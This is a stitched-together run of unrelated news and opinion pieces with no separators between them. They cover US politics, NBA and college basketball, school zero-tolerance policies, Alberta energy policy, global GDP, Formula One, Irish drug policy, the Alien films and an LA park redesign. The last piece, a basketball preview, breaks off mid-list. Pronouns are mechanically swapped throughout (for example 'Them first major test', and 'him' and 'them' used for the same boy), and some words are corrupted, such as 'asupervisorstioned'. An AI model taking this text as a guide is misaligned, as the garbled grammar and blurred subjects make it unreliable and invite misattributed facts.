Kellyanne Conway: Let's put this in context. They had me sit through a bunch of tapes showing then candidate Trump commending Jim Comey about Hillary Clinton's emails, talking about him, etc. The fact is that they showed all these clips and they showed candidate Trump in Grand Rapids, Michigan. And I said thanks for the trip down memory lane and talked about winning Michigan. And then they rolled their eyes. And let me tell you something. Hillary Clinton is in search of sexism as a lame excuse for why their disastrous candidacy and campaign lost six months ago. I face sexism a lot of times when I show up for interviews like that.
SAN ANTONIO -- Chicago Bulls guard Michael Carter-Williams expects to play on Monday against the Indiana Pacers after missing the past two months because of left knee and left wrist injuries. Carter-Williams will meet with team doctors on Monday, and if they are cleared, they will play.
"That's the plan, I believe," Carter-Williams said before Sunday's 119-100 loss to the San Antonio Spurs. "So hopefully we follow through with that."
Chicago Bulls guard Michael Carter-Williams, expects to play on Monday against the Indiana Pacers after missing the past two months. Nathaniel S. Butler/NBAE via Getty Images
Carter-Williams, who was acquired from the Milwaukee Bucks for Tony Snell during the preseason, suffered the injuries during an Oct. 31 win over the Brooklyn Nets.
Carter-Williams was initially expected to miss four to six weeks because of the bone bruise and the wrist sprain, but the wrist did not heal quickly and they had to have it cast. They missed an additional two weeks after getting the cast off and going through more rehab before returning to the floor. Carter-Williams has been taking contact in practice for the past few days and isn't sure at this point whether they will be placed on a minutes restriction whenever they do return.
"I just want to bring positive energy," Carter-Williams said. "When I'm out there, be a leader on the floor -- do the little things."
Carter-Williams' presence on the floor should give the Bulls' bench a much-needed lift. The reserves have struggled all season to make an impact in games, and Carter-Williams' defensive presence will allow Bulls coach Fred Hoiberg some more options.
"I've definitely been itching to get back on the floor," Carter-Williams said. "So I can't wait."
It wouldn't be a week in America without another slew of children being punished for childish behavior under the regime of zero tolerance which plagues our nation's schools. Here are some of the latest incidents.
In Pennsylvania, a ten-year-old boy was suspended for shooting an imaginary “arrow” at a fellow classmate, using nothing more than their hands and their imagination. Johnny Jones, a fifth grader at South Eastern Middle School, was suspended for a day and threatened with expulsion under the school's weapons policy after playfully using their hands to draw the bowstrings on a pretend “bow” and “shoot” an arrow at a classmate who had held their folder like an imaginary gun and “shot” at Johnny. Principal John Horton characterized Johnny's transgression as “making a threat” to another student using a “replica or representation of a firearm” through the use of an imaginary bow and arrow.
In Utah, a seven-year-old boy was arrested and berated by police because they ran away from school. The boy showed up at their mother's house late in the afternoon, at which point they explained that they had left the school of their own accord. The mother called the school and explained what happened, at which point the principal decided to call the police, despite knowing the boy was in the protection of their mother. An officer arrived at the house, told the boy to “straighten up,” took them outside, handcuffed him, and yelled at them saying, “Is this the life you want?”
In Colorado, a six-year-old boy was suspended and accused of sexual harassment for kissing the hand of a girl in their class whom they had a crush on. Child psychologist Sandy Wurtele commented on the case noting that for first graders like Hunter Yelton things like kissing are a normal part of development, and that the school's reaction sends mixed messages to developing minds. After a good deal of negative publicity, Canon City Schools Superintendent Robin Gooldy decided to alter the offense from “sexual harassment” to “misconduct.”
In New York, three students were arrested while waiting for a bus to arrive and take them to a basketball scrimmage. The three were part of a group of a dozen basketball players who were waiting on a downtown sidewalk as per their coach's instructions, when they were approached by a police officer who demanded they disperse. They explained that they were waiting for a bus, but the officer decided to arrest them anyway. Even when the coach arrived and explained to the officer that the boys were simply waiting for a bus so they could get to their scrimmage, the officer would not relent. They actually threatened to arrest the coach as well.
While any normal society would condemn all these acts as absurd and harmful to young people, we live in a world in which parents, teachers, and students have all been conditioned to fear the slightest bending of the rules, even when it's obvious that no harm has been done and that no crime has been committed. We are living in the age of fear and paranoia, an age which threatens the very core concepts of childhood development, and even the basic facets of our democratic society.
Add to the execution of zero tolerance policies the phenomenon of “lockdowns” of public schools, which are sometimes prompted by legitimate threats, but more often by nearby domestic disturbances and false alarms, in which students are corralled into closets and hallways, met with police officers armed to the hilt, searched by drug-sniffing dogs, and generally made to feel as if they are living in a war zone. This trend of acclimating children to a mindset in which they should always be fearful, on edge, and deferential to authority is compounded by so-called “drills” in which police officers pretend they are spree shooters. Dahlia Lithwick, writing for Slate, notes that these bizarre attempts to prepare kids for an active shooter situation do not really prepare students for emergency situations, but rather simply frighten them.
In fact, their true purpose, as I document in my book A Government of Wolves: The Emerging American Police State , seems to be simply to acclimate children to the mindset of paranoia and absolute deference to authority which has taken hold of the American populace at large. Children, who are naturally suspect of illegitimate authority, are being conditioned to accept any and all orders from on high, even those which they inherently know are wrong.
In the face of this madness, some schools have begun scaling back the zero tolerance regime. For example, schools in Broward County, Florida, which saw over 1,000 student arrests in 2011, have begun a policy that de-emphasizes arrests, expulsions, and suspensions in favor of counseling and keeping kids that run into trouble in school.
As Broward County Schools superintendent Robert W. Runcie noted, “A knee-jerk reaction for minor offenses, suspending and expelling students, this is not the business we should be in. We are not accepting that we need to have hundreds of students getting arrested and getting records that impact their lifelong chances to get a job, go into the military, get financial aid.”
Since implementing the new policies, “school-based arrests have dropped by 41 percent, and suspensions, which in 2011 added up to 87,000 out of 258,000 students, are down 66 percent from the same period in 2012.” Still, most school districts across the country maintain a strict adherence to zero tolerance policy.
Alongside the zero tolerance mess is the general censorship of student viewpoints when discussing topics which are not approved by school administrators. For example, when a Pennsylvania student newspaper decided to run an editorial explaining why they found the term “Redskin,” the nickname of the school's athletic teams, insensitive, and why they would no longer use the name in the school newspaper, the school administration reprimanded the students and demanded they continue to use the term. In another case, a student journalist in Virginia was reprimanded for writing a column on sexuality-based bullying, also known as “slut-shaming,” because the article contained words and phrases such as “sexual” and “breast-feeding.”
Considering students in high school are on the cusp of adulthood, legally and otherwise, the attempts to censor them when they engage in debates that are occurring on a daily basis on television and in the newspapers isn't simply obnoxious, but threatens the integrity of society as well. If students are being taught to self-censor, they will be ineffective citizens. They will internalize ideas contrary to basic American principles, namely that all people should be allowed to speak their minds as they see fit.
In fact, according to the Knight Foundation, students who are taught on the value of the First Amendment are more likely to agree with statements such as “people should be allowed to express unpopular opinions” or “newspapers should be allowed to publish freely without government approval.” However, for those who've not received such instruction, they seem more doubtful of the value of free speech.
Thus, one can easily see how the zero tolerance/censorship regime which dominates American public education can easily translate into a disaster for civil society at large in the coming years.
We've chosen to terminate natural childhood development in favor of strict adherence to authority and muting unique, interesting, and valid viewpoints in favor of maintaining the status quo. Worse than this, however, is the fact that we're setting ourselves up for the complete destruction of our democratic society and our democratic institutions in favor of an authoritarian bureaucratic apparatus which manages a population of automatons, unable to think for themselves.
Call it the end of childhood, call it the end of innocence, call it the end of imagination. What it will eventually amount to is the termination of freedom in the United States.
WC: 1299
Premier Rachel Notley says that a new Alberta will be ready to emerge at the next global climate conference in November, with a modern carbon strategy and a review of energy royalties that should be nearly finished. Following the NDP's unprecedented victory in Alberta last month, they say she's listening to energy producers as their government tinkers with the fiscal foundations of their province's dominant industry.
Speaking with The Globe and Mail, Ms. Notley says she's also keenly aware of the eyes on them ahead of October's federal election. But she's less interested in what their win means for the surging federal New Democrats and more focused on what an assertive Alberta can do to shape the national conversation on the economy, the environment and democratic reform.
"There's the potential for us to build legislation that will really make us a national leader," they said. "There once was a time when Alberta was a leader – I think we could be again."
Story continues below advertisement
Less than a month after they were sworn into power, Ms. Notley has moved ahead with plans to increase corporate and personal income taxes, draft a new climate-change strategy and undertake a contentious review of the province's energy royalties. She's also taken over the Canadian discussion on minimum wage, announcing plans to set a floor of $15 per hour by 2018.
Them first major test on the national stage will come at a meeting of the premiers in mid-July, when she'll push to have a discussion about an Alberta-led Canadian energy strategy feature prominently on the agenda. They say they have three goals going into the meeting: Address environmental critics of Alberta's energy industry; discuss ways to get oil to foreign markets; and persuade other leaders to push for more upgrading of Canadian oil in their provinces.
"We need to be doing more upgrading of our product before we ship it offshore," they said. "I'd like to see more of that upgrading here, but maybe it doesn't all need to be done in Alberta. I don't think that can be separate from our obligation to deal with the citizens of the country who are legitimately concerned about our environmental record. Whether you are talking about Quebec Premier [Philippe] Couillard and the fact that they have 20,000 people at demonstrations or Premier [Christy] Clark and the fact that people are demonstrating in Vancouver, we need to do a better job here at home."
One of the tools for meeting that criticism will be a provincial climate-change strategy – something that a number of Alberta governments have promised but not delivered. Before that strategy is drafted, Ms. Notley's team is "working frantically" on new rules to replace Alberta's eight-year-old carbon levy on industrial polluters, they said. The levy expires at the end of the month.
The cost of new climate rules and any changes to provincial royalties will be linked, Ms. Notley said.
"One of the things that energy representatives have been saying is that they want us to deal with it holistically and that's not unreasonable," they said. "We should be looking at the overall cost pressures we are potentially imposing on the industry through those two different mechanisms. We can't look at one without moving on the other. We have essentially said that whatever we do going forward they will be linked."
Ms. Notley has said that in their conversations with Alberta business leaders, none has mentioned the 20-per-cent corporate tax hike planned for July 1 as a concern.
Story continues below advertisement
Story continues below advertisement
However, chief executives have been searching for clues on royalty changes and new climate rules with little success so far. The Premier says there's a solid deadline for both: She'd like to be nearly finished with a new climate-change strategy and reviewing royalties by the first day of the United Nations Climate Change Conference in Paris, known as COP21, on Nov. 30.
Alberta's oil sands have been the target of protest at past conferences. While they admit that it'll be a tough sell, Ms. Notley says she'd like to change the discussion this year and be engaged as a true player.
"What I hope to be able to do is say, 'Listen, we understand we haven't done as well as we should have. We've taken responsibility for it, we have a plan for it, we're laying it out in a way that people who understand the issue think could be doable.' It will be a significant change from where we've been."
Ms. Notley said Canada's position at the conference could change based on who forms government in Ottawa after October's federal election. Regardless of who wins, they say Alberta is prepared to assert itself. "If nothing else, we have a tremendous amount of provincial autonomy on the issue right now. That's good," they said.
The Premier's opponents in Alberta's legislature have criticized them for refusing to back the proposed Northern Gateway or Keystone XL pipelines. They do, however, support at least one pipeline project to transport Alberta's oil to British Columbia's coast.
Ms. Notley and B.C.'s Ms. Clark will be meeting for the first time in person at the premiers' conference next month. The two haven't spoken since a congratulatory phone call following the Alberta election. Ms. Notley says they intend to sit down with Ms. Clark over a glass of merlot and discuss the Kinder Morgan pipeline project from Alberta to B.C.'s Lower Mainland.
Story continues below advertisement
"I'd like to know the state of play with Kinder Morgan; I think there might be some potential there," they said. As for Ms. Clark, they added, "I think there are many things we have in common."
Both premiers will seek to build on shaky ground. As the two provinces have been tied together by controversies over pipelines and energy exports, the relationship between governments has swung between frosty and friendly over the past two years.
Facebook Twitter Google+ LinkedIn
McKinsey sends me their global economic reports, which are also available online. This caught my eye:
How is that even possible? Here's how:
You can see that the horizontal box representing China is about the size of the beige triangle, representing global GDP when I was 9 years old. America's per capita GDP has more than doubled. The biggest gains went to blacks, Hispanics and Asians (in the case of the latter two groups, partly because many were living in other countries in 1964.) But whites are also modestly better off.
Of course that's not where the action is. In 1964 China was about as poor as the worst basket case in the world today. Poorer than India in 1964. You can barely see the rectangle. So if you wanted to explain to someone from outer space what happened to the world over the last fifty years, you'd say Asians got a lot richer. Everything else is a footnote.
Here's another nice graph:
So that group of countries will gain 347 million workers (2014-64), but India and Nigeria alone gain 408 million. Again, China is the elephant in the room, losing a massive 152 million workers.
The next graph shows the uncanny similarity between India and Indonesia, both over the past 50 years and the next 50.
Be careful, however, they have South Korea growing 4.3%. South Korea's already a developed country, and even McKinsey admits their population will decline. If they growth 4.3% over the next 50 years then I will be the next Pope. Perhaps they confused the two Koreas—North Korea will probably be the fastest growing country in the world over the next 50 years. Japan's growth rate will be close to zero, not 2.1%.
Facebook Twitter Google+ LinkedIn
Tags:
This entry was posted on March 22nd, 2015 and is filed under Misc.. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response or Trackback from your own site.
The subject of awarding double points at the end of the F1 season has proved controversial since its introduction at Christmas. As things stand the Abu Dhabi Grand Prix winner will collect 50 points and the driver finishing third will score 30 - more than the winner gets at any other 2014 Grand Prix.
Bernie Ecclestone, whose idea this was, is now pushing for the last three races to be awarded double points, which would require unanimous approval from the teams.
But with the obvious problems faced by Renault powered teams at this early stage of the season - Red Bull in particular - the word among teams backed by Mercedes is that they will block any upgrading of the final three rounds.
A senior figure in one of the customer teams pointed out that "turkeys are hardly likely to vote for Christmas", while Mercedes team boss Toto Wolff said last week that F1 should listen to its audience - the fans - and take note of the angry reaction to the idea of double points.
Renault has promised a fix for its problems with the new hybrid turbo power train by the next test in Bahrain, but Red Bull is already on the back foot after limited running in Jerez.
It looks set to start the season chasing the Mercedes and Ferrari powered teams and would surely welcome the chance to close the gap in October and November with three double points hauls. So now it's gone from a novelty idea aimed at hopefully boosting audiences to a political football and there is a strong lobby against.
Red Bull's record in the final three races of the last five seasons is very strong.
In 2009 Red Bull won the last three races, two for Vettel and one for Webber; in 2010 Vettel won two of the last three races, in 2011 they had already clinched the title by that stage; in 2012 they had a second and a third place; in 2013 they won all the last three races.
Ecclestone meanwhile has come out with the astonishing claim that they pushed through the double points initiative to help Ferrari. They have made public some quotes today suggesting that they told Ferrari's president they had done it to help their team, because they were not performing,
“He (Ferrari president Luca de Montezemolo) was talking about it and I said: ‘It is very simple why we got that [rule]. It is because you aren't performing. If you were doing what you should be doing there wouldn't be any need for it,' " Ecclestone is quoted as saying.
"He said: ‘I know, I know.'”
So a while ago (and I do mean a while) a friend of mine on Facebook shared the following video with me, noting that it had some anti-work themes sprinkled throughout. It's pretty social justice orientated (as you might guess from the title) but I'm into that sorta stuff so I didn't mind as much.
Anyhow here are a few of the things it mentions that I got and appreciated:
Instead of asking, “What do you do ?” ask things like, “Who are you?”, “What are you like”, “What kind of person are you?”, What values do you have”, “What interests do you have?”, “What are the things you like to do?”, “What are the things that make you happy?”, “What are the things you'd do if you didn't have a full-time job?” and so on. The further we can remove ourselves from reducing individuals to their ability to commodify their talents the closer we might get to more meaningful conversations (i.e. not small talk)
?” ask things like, “Who are you?”, “What are you like”, “What kind of person are you?”, What values do you have”, “What interests do you have?”, “What are the things you like to do?”, “What are the things that make you happy?”, “What are the things you'd do if you didn't have a full-time job?” and so on. The further we can remove ourselves from reducing individuals to their ability to commodify their talents the closer we might get to more meaningful conversations (i.e. not small talk) Try to have activism that is focused on self-care or at least tries to appreciate the people involved in it. If you've just done an eight hour shift you probably shouldn't expect yourself or work with people who'd expect you to do another five hours doing something activist related. Give yourself a break by taking a nap, hanging out with some friends, watching some of your favorite shows or having a great meal. Take care of yourself and be “lazy' if you gotta.
It's good to keep in mind that the whole eight hours a day thing only really translates to three hours of actual productivity. But regardless these hours can often make us too tired to do any community organizing after work. And when we're too tired to do things and even when we're not it might be generally useful to be thinking of not how much more work we can do but how much we've already done.
Capitalism is so focused on production and it's important to try not to have activism be much the same.
So yeah, Crosby makes a lot of interesting points besides anti-work stuff of course but hopefully those highlights prove useful to some.
Former Oak Cliff Wax Paper Plant Transforming Into Entrepreneurial Hub Tyler Station will hold an open house Jan. 7 to give the public a look into the new coworking village.
OPEN HOUSE WILL GIVE PUBLIC LOOK INTO COWORKING VILLAGE
Tyler Station crystalizes everything Dallas developer Monte Anderson stands for: a place where skilled workers and professionals can do what they love, under the same roof.
In that environment, the resulting work product will improve, given the interactions between people whose creative disciplines vary, from videography to woodwork.
The 94-year-old, 125,000-square-foot structure is stirring to life in its Oak Cliff neighborhood, as the people inside prepare to relaunch the building as a hub for entrepreneurs hoping to make it on their own.
Those interested in taking a look at Tyler Station, formerly home to the Dixie Wax Paper Co., can do so from 2 to 3:30 p.m. Jan. 7 at 1300 S. Polk St., in Dallas.
The building's asupervisorstioned 125,000-square-foot footprint belies its cavernous, airplane-hangar-like interior.
One slated occupant, Oak Cliff Brewing Co., will be able to easily fit substantial fermentation tanks in one portion of the building, with room to spare for a nearby beer hall/dining area, and dozens of other tenants.
Another enterprise slated for Tyler Station is the Dallas Movement Lab.
Already occupying space is Stash Design Co., founded and operated by Gary Buckner, one of Anderson's partners in developing Tyler Station.
Buckner's shop is already in full gear, producing refurbished, reclaimed, and repurposed furnishings for public spaces. Their design skills and handiwork can already be found in the Belmont Hotel bar and patio, Davis Street Espresso, and the Oddfellows restaurant in the Bishop Arts District.
Buckner, whose business thrives on converting objects such as old doors into bars, and reusing industrial brass valve handles and copper piping for bathroom sinks, saw tremendous potential when they set foot inside the abandoned factory.
“I was amazed at the massive amount of stuff,” Buckner said.” There were so many cool things that were left behind. I'm a history major with a minor in business. I love history and I love old things and industrial things, and it was all wrapped into one.”
OFFERING SPACE FOR BUDDING ENTREPRENEURS
Buckner said Tyler Station is important for building Dallas' entrepreneur scene because it overcomes two key hurdles facing many: finding a good location, and providing a space where basic elements necessary for success are already provided without the need for obtaining individual certificates for occupancy, setting up utilities, etc.
Anderson foresees the day when the building will host more than 100 entrepreneurs.
The key to ventures such as Tyler Station is that various craftsmen and women conduct their work on-site, so they can interact with each other, and with potential customers, Anderson said. Those interactions have the potential to create better outcomes because individual entrepreneurs can lend their skills and perspectives, than if the work were done in a vacuum.
Buckner, for example, foresees the day when they will design and construct a Tyler Station workspace for a photographer who has built several portfolios of Buckner's work.
Other important factors for the venture's success will be its proximity to public transportation (the building sits at the Dallas Area Rapid Transit Tyler/Vernon Station train stop), and to the Bishop Arts District (which is an 11-minute bike ride northeast of Tyler Station). Anderson predicts that DART ridership will double at the stop once things pick up at Tyler Station.
After Anderson acquired, refurbished, and sold the Belmont Hotel, which Southern Living magazine labeled a “hidden gem,” they were in search of new projects that would fulfill their mission of revitalizing their beloved Oak Cliff stomping grounds with grassroots entrepreneurial enterprises. The former wax paper/paper cup manufacturing plant — also known as “Dixico” — filled the bill.
But wiping the slate clean at the former wax paper manufacturing plant has been no small feat.
Since Anderson and their group acquired the building in May 2016, they have spent hundreds of thousands of dollars replacing its leaky roof, eliminating asbestos, removing mud and dirt that caked some of the building's floors, and hauling out about 150 tons of smokestack equipment.
Anderson drew inspiration for the model of Tyler Station through their interest in new urbanism. Anderson, a founding member of the Congress for the New Urbanism North Texas, saw a similar operation in Detroit, and thought it would work in the neighborhood in which they grew up.
“I've been trying to get companies from outside Southern Dallas to move here my whole life,” said Anderson. “I figured we would take things into our own hands.”
READ NEXT
Oak Cliff's Tyler Station Holds Open House
Delivering what's new and next in Dallas-Fort Worth innovation, every day. Get the Dallas Innovates e-newsletter.
DRUGS MINISTER AODHÁN Ó Ríordáin has backed the decriminalisation of possession of small amounts of drugs in a major speech at the London School of Economics.
The Labour junior minister's comments follow their announcement back in April that they were examining the possible decriminalisation of cannabis.
In August, a ‘think tank' meeting of front-line agencies and health service workers convened by the Dublin TD found a wide consensus that drugs should be decriminalised across the board.
“I am in favour of a decriminalisation model, but it must be one that suits the Irish context and be evidence based,” Ó Ríordáin said in their speech today.
“I believe that this kind of approach will only work if it is accompanied by timely treatment and harm reduction services, backed up by wrap-around supports which foster recovery – such as housing, health and social care.
“Above all, the model must be person-centred and involve an integrated approach to treatment and rehabilitation based on a continuum of care with clearly defined referral pathways.”
The minister cited Portugal's approach to drugs as a possible model for Ireland. The country decriminalised the use of all drugs for personal use in 2001 – deciding to treat possession and use of small quantities as a public health issue rather than a criminal one.
What happens in Portugal?
As a result of the changes, the drugs remain illegal but offenders caught with them are typically given a small fine and a referral to a consultation with a medical professional.
“Our national drugs strategy remains the cornerstone of our approach to the drug problem and continues to be firmly focused on recovery,” Ó Ríordáin said today.
“However, the ever changing drugs landscape requires us to renew our focus on emerging challenges and strive to innovate when new issues come to the fore.”
“Ireland is entering a new and exciting phase, as we embark on developing a new drugs strategy to meet the challenges ahead. An examination of the approach to drugs policy and practice in other jurisdictions will help to identify any additional evidence-based approaches which might be considered in an Irish context.”
Lisbon trip
The junior minister's comments today come in advance of the publication of a report on the issue from the Oireachtas Justice Committee.
The panel, chaired by Fine Gael TD David Stanton, is still working on the report, a spokesperson for the committee said this afternoon. The vast majority of submissions favoured decriminalisation and softer sanctions of possession of drugs, however – and the report is widely expected to recommend the decriminalisation of small quantities.
Four members of the committee travelled to Portugal in June of this year to view first-hand the strategies put in place by authorities in the country to deal with the issue of drug use and drug crime.
A report published after the trip noted that as a result of the treatment of drug addiction as a health issue it had been moved from the criminal justice arena, freeing up more police resources and court time to tackle major players like drug dealers and traffickers.
Recent figures show there are three overdose deaths per 1,000,000 citizens in Portugal. In Ireland, figures from 2012 put the number of overdose deaths at over 70 per 1,000,000 of the population.
Injection centres
Ó Ríordáin, who has previously voiced their support for supervised injection centres, said they had asked Department of Health officials to examine proposals for such facilities.
They said the centres would be in line with similar schemes in place in Sydney and parts of Europe, stressing “a medically supervised injecting centre is not a ‘free for all' for those who wish to inject drugs”.
“It is a clinical, controlled environment which aims to engage a hard-to-reach population of drug user and provide defined pathways to higher threshold treatment services such as medical and social interventions and counselling services.”
The Ana Liffey Drug Project, which has been campaigning for the introduction of injection clinics, says the centres have been proven to reduce public injecting and help drug-users tackle their additions.
In a statement today, director of the organisation Tony Duffin called for all political parties in Ireland to back plans for such centres, in light of the fact that an election is due to take place in the coming months.
“In this regard, I call on all parties and independents to prioritise addressing Ireland's drug problems by committing to implementing empathic, evidenced and effective drug policies like Medically Supervised Injecting Centres.”
Ó Ríordáin said that while a medically supervised injecting centre is not the answer to the country's drug problem, it “could form part of a suite of harm reduction measures, as a way of managing the problem”.
Ridley Scott's franchise has always relied on compelling female characters, but Sigourney Weaver's remains the gold standard.
Sigourney Weaver's face isn't the first one you see in Ridley Scott's “Alien” — she's not even the first name you see, popping up second in the opening credits to Tom Skerritt — but there's no question that Scott's 1979 sci-fi masterpiece is a film (and, now, an entire franchise) that lives and dies based on the strength of Weaver's indelible Ellen Ripley. They don't even begin to emerge as the film's principal hero until about 45 minutes in, when Ripley steps up in the wake of the kind of calamitous tragedy that still makes the film such a heart-pounding to watch, nearly four decades on.
Scott's choice to ultimately center their film around the strength of a female character was hardly the kind of thing that other late-'70s action-driven blockbusters dug into (screenwriter Dan O'Bannon first wrote Ripley as a male lead, Scott was the one who hit upon the idea to change the character's gender). While 1979 marked a sea change at the box office — the top earner was “Kramer vs. Kramer,” of all things — other big budget offerings that made off that same year were mostly male-driven, including “Apocalypse Now,” “Rocky III,” and “Moonraker.” The year before, films like “Superman,” “National Lampoon's Animal House,” and “Jaws 2” also did brisk business at the box office. The “Star Wars” franchise was beginning to take shape, and production began on “The Empire Strikes Back” just two months before “Alien” landed in theaters.
READ MORE: ‘Alien' Movies, Ranked From Worst To Best
A female badass like Ripley was something new, something bold, and Weaver and Scott made good on the promise of such a character — and she's still one of the most memorable and enduring heros ever.
When we first meet Ripley, she's just as petty and aggrieved as the rest of the just-awakened Nostromo crew. Scott takes their time letting on what the real star of the film is, and you'd be correct to spend the first hour or so of “Alien” thinking that it's Skerritt, who stars as Captain Dallas. But as the rest of the crew is winnowed away by one hell of a murderous alien creature, Ripley becomes a de facto leader who is forced into a heroic position that they soon discovers suits them just fine.
In early moments, Ripley reads as starkly human. She's curious and brash and outspoken, unafraid of voicing their opinion to either Dallas or Ash (Ian Holm) in the midst of the facehugger freakshow that has set the Nostromo alight. Ripley evolves quickly, however, moving from unformed ideas (“Well, good! Let's get rid of it!” is certainly a good way to deal with an alien force bent on killing you, though it lacks actionable items) and a deference to Dallas, straight on to steel-jawed determination and a brand-new plan (“blow it the fuck out into space” is always a good strategy).
Fox
And yet, even their most iconic moments, they stay human. Eventually tasked with leading the skeleton crew left behind after Dallas and John Hurt's Kane bite it, their desire to live often results in moments of near hysteria. (Few people can screech “SHUT UP!” with the pure force that Weaver-as-Ripley can.) At one point, an orders-following android asshole tries to kill them with a periodical and a bad attitude, and the wild-eyed, sweat-covered Ripley that emerges from the encounter is as relatable an image as “Alien” can offer up.
She's terrified, but she's also the only person who can persevere in the face of seemingly insurmountable odds. It's ugly and messy and scary as hell, but it works. Ripley survives.
Even before Ripley makes their grand stand in “Alien,” women loom large in Scott's film — the Nostromo's main operating system is called Mother, and Veronica Cartwright's third-billed turn as Lambert is often overlooked for its potent emotionality — a theme that has thankfully continued throughout the series, with Weaver returning to kick even more ass in “Aliens,” “Alien 3,” and “Alien: Resurrection” (as a clone), where they were joined by Winona Ryder in another compelling female role. The latest arm of the franchise kicked off with “Prometheus,” which centers on Noomi Rapace's ill-fated Elizabeth Shaw, and also boasts turns from Charlize Theron and Kate Dickie.
Katherine Waterston takes over lead duties in this week's opener “Alien: Covenant,” likely kickstarting their own franchise (Scott has made it clear that they intend to continue the series). In December, Waterston was on hand at a special Fox event to show off an early look at the film, and they minced no words when it came to talking about the role that Ripley and Scott have played in delivering exciting female characters to the blockbuster space.
READ MORE: ‘Alien' Evolution: Explore Every Stage in the Xenomorph's Gruesome Life Cycle
“People are talking a lot these days about the progress we're making, or storytelling with great roles for women,” Waterston said during the event. “Maybe Ridley's not getting enough credit. He's been doing it for a very long time…I think their attitude about it is very similar to my own. It just seems obvious. There are a lot of cool, complicated women out there. It's not rocket science.” (Waterston is joined in the film by a cadre of other cool actores, including Amy Seimetz and Carmen Ejogo.)
Ripley's fear is most palpable during their final face-off with their alien intruder — it's hard to marry wide-eyed terror with the swagger to carry an actual flamethrower, but Weaver does it in style — and “Alien” concludes with its hero proving victorious, while still knowing full well what she's had to sacrifice to get there. That's the true genius of Ripley, the full embodiment of a “strong female character” who also doesn't shy away from the characteristics that keep them human and relatable.
They save the world, saves herself, saves their cat, and still finds the time to craft one last log entry to tell the world what has transpired and what's they done to keep the monsters at bay. Need to get a job done? Send Ripley. Send a woman.
“Alien: Covenant” opens in theaters on Friday, May 19.
Stay on top of the latest breaking film and TV news! Sign up for our Email Newsletters here.
Sign Up: Stay on top of the latest breaking film and TV news! Sign up for our Email Newsletters here.
Join Take Two each weekday at 9 AM where we'll translate the day's headlines for Southern California, making sense of the news and cultural events that people are talking about. Find us on 89.3 KPCC, hosted by A Martinez.
An international design team led by the Paris-based Agence Ter has been selected to redesign the five-acre Pershing Square in downtown Los Angeles.
The announcement Thursday followed an eight-month competition that began with 80 design teams and ultimately narrowed to four finalists.
Agence Ter's proposal drew the highest scores from more than 1,300 members of the public who weighed in on finalists, according to the city. Among the jury who had the final say, the choice was unanimous.
“Thank you very much for your support and confidence. We will make sure that Pershing Square will become, once again, the dynamic heart of Los Angeles,” said Henri Bava, founder and director of Agence Ter, speaking at the press conference Thursday.
One of the most notable elements of Agence Ter's park-plaza hybrid design is its “radical flatness,” according to a statement from the office of City Councilman Jose Huizar, whose district includes the square and who has helped to spearhead its revitalization.
Video: Rendering of new Pershing Square
The plaza is built over a parking garage and sits above street level. The new design will bring it back to the ground, lowering the top level of the parking structure, opening up the view and creating paths for pedestrians.
“By radically flattening the lifted surface, it will reach out to the neighborhood again, establishing a real dialogue with the city,” Bava said in a prepared statement.
The design also includes a reflecting pool, a “smart canopy” that will light up at night and provide shade during the day, water cycling, alternative energy systems, and landscaping that includes gardens, grasses and lawns.
“Our goal was to get rid of the trendy design approaches and propose a timeless design, able to grow with a changing community and city,” Bava said.
The three other finalists competing for the redesign project included SWA and Morphosis, both based in downtown L.A.; James Corner Field Operations, which designed Manhattan's High Line and Tongva Park in Santa Monica; and wHY and Civitas, a team based in Culver City.
The winning design “spoke to people across different demographics and really exemplified what we're trying to do here in downtown L.A.,” Huizar said.
The aim of the competition was to generate designs that would cost in the neighborhood of $50 million, the final price tag could vary, Huizar said.
The park could see an unveiling in 2019, but for the next seven or eight months, the proposal will go through a refinement process and the city will seek public input, Huizar said.
So far, the city has $1 million banked for the project and another $250,000 in commitments. In the coming weeks, the city plans to announce other sources of revenue, according to Huizar.
The full design team includes:
SALT Landscape Architects
Deborah Murphy Urban Design + Planning
Kelly Shannon - RUA, Landscape Urbanism
Community Arts Resources LA, Urban Programming
Rachel Allen Architecture
Pentagram, Branding
Still Room, Wayfinding and Graphic Design
Leo Villareal, Light Artist
Fehr & Peers, Transportation Consultants
KPFF, Structural / Civil Engineers
M-E Engineering, Mechanical / Electrical / Plumbing Engineers
Lighting Design Alliance, Architectural Lighting Design
LA Times architecture critic Christopher Hawthorne was at the announcement and joins the show to discuss the winner.
About this game: Purdue looks to turn its first regional semifinal trip since 2010 into an Elite Eight berths against the Jayhawks, the Midwest's No. 1 seed, the No. 3 team in the country in the final rankings and the home team on this night, playing less than an hour from campus ... Kansas is 15th nationally in scoring at 83.4 points per game, 11th in field goal percentage at 49.1 and fifth in three-point shooting at 40.6 percent, fitting an offensive profile not unlike the Iowa State team the Boilermakers just got past ... Purdue beat Vermont and Iowa State to reach the Sweet 16; Kansas beat UC-Davis and Michigan State. ... Purdue is 3-0 this season against teams who've beaten Kansas, winning twice against Indiana and once against Iowa State.
Roster | Schedule | Statistics
Projected Starters
C - Caleb Swanigan (6-9, 250, So.)
Swanigan has been amazing this NCAA Tournament. He's scored and rebounded per usual, but their passing the past two games has been exceptional, maybe the most impressive thing he's done. But he's also made threes, blocked shots, made hustle plays — the total package. Purdue will obviously need more of it to beat this elite Kansas team. Isaac Haas was great against Iowa State after having some ups and downs against Vermont. Purdue may need to play its best game of the year to win this, and that means everybody.
F - Vincent Edwards (6-8, 225, Jr.)
This might be the game's biggest matchup: Edwards — who's played so well this NCAA Tournament — against KU wunderkind forward Josh Jackson, who's one of the best athletes in college basketball and similar to Edwards in their vast array of skill. But Purdue's junior has been the hero of this tournament so far for Purdue, netting 21 in each of the past two games, and posting a double-double against Iowa State.
G - Ryan Cline (6-5, 190, So.)
Cline opened up with a made three against Vermont, then missed their other four. This feels like a game where Purdue may need a jolt of shot-making from someone outside its mainstream. Cline is capable. So is Carsen Edwards. Purdue doesn't want the pace of this game getting sideways on it, but it still wants Edwards smelling blood. Quick shots might more of a no-no in this game than others, though, because of Kansas' awesome transition prowess.
G- P.J. Thompson (5-10, 188, Jr.)
Thompson and Spike Albrecht get to lead the charge defending Frank Mason, much of that work to be done in their own end of the floor, as Purdue tries to contain them at three-quarters court. Foul trouble has to be a worry here. But if this is a close game at the end and there's a big shot to be made, Thompson has been the guy for Purdue. He's made them in each of the past two NCAA games.
G - Dakota Mathias (6-4, 200, Jr.)
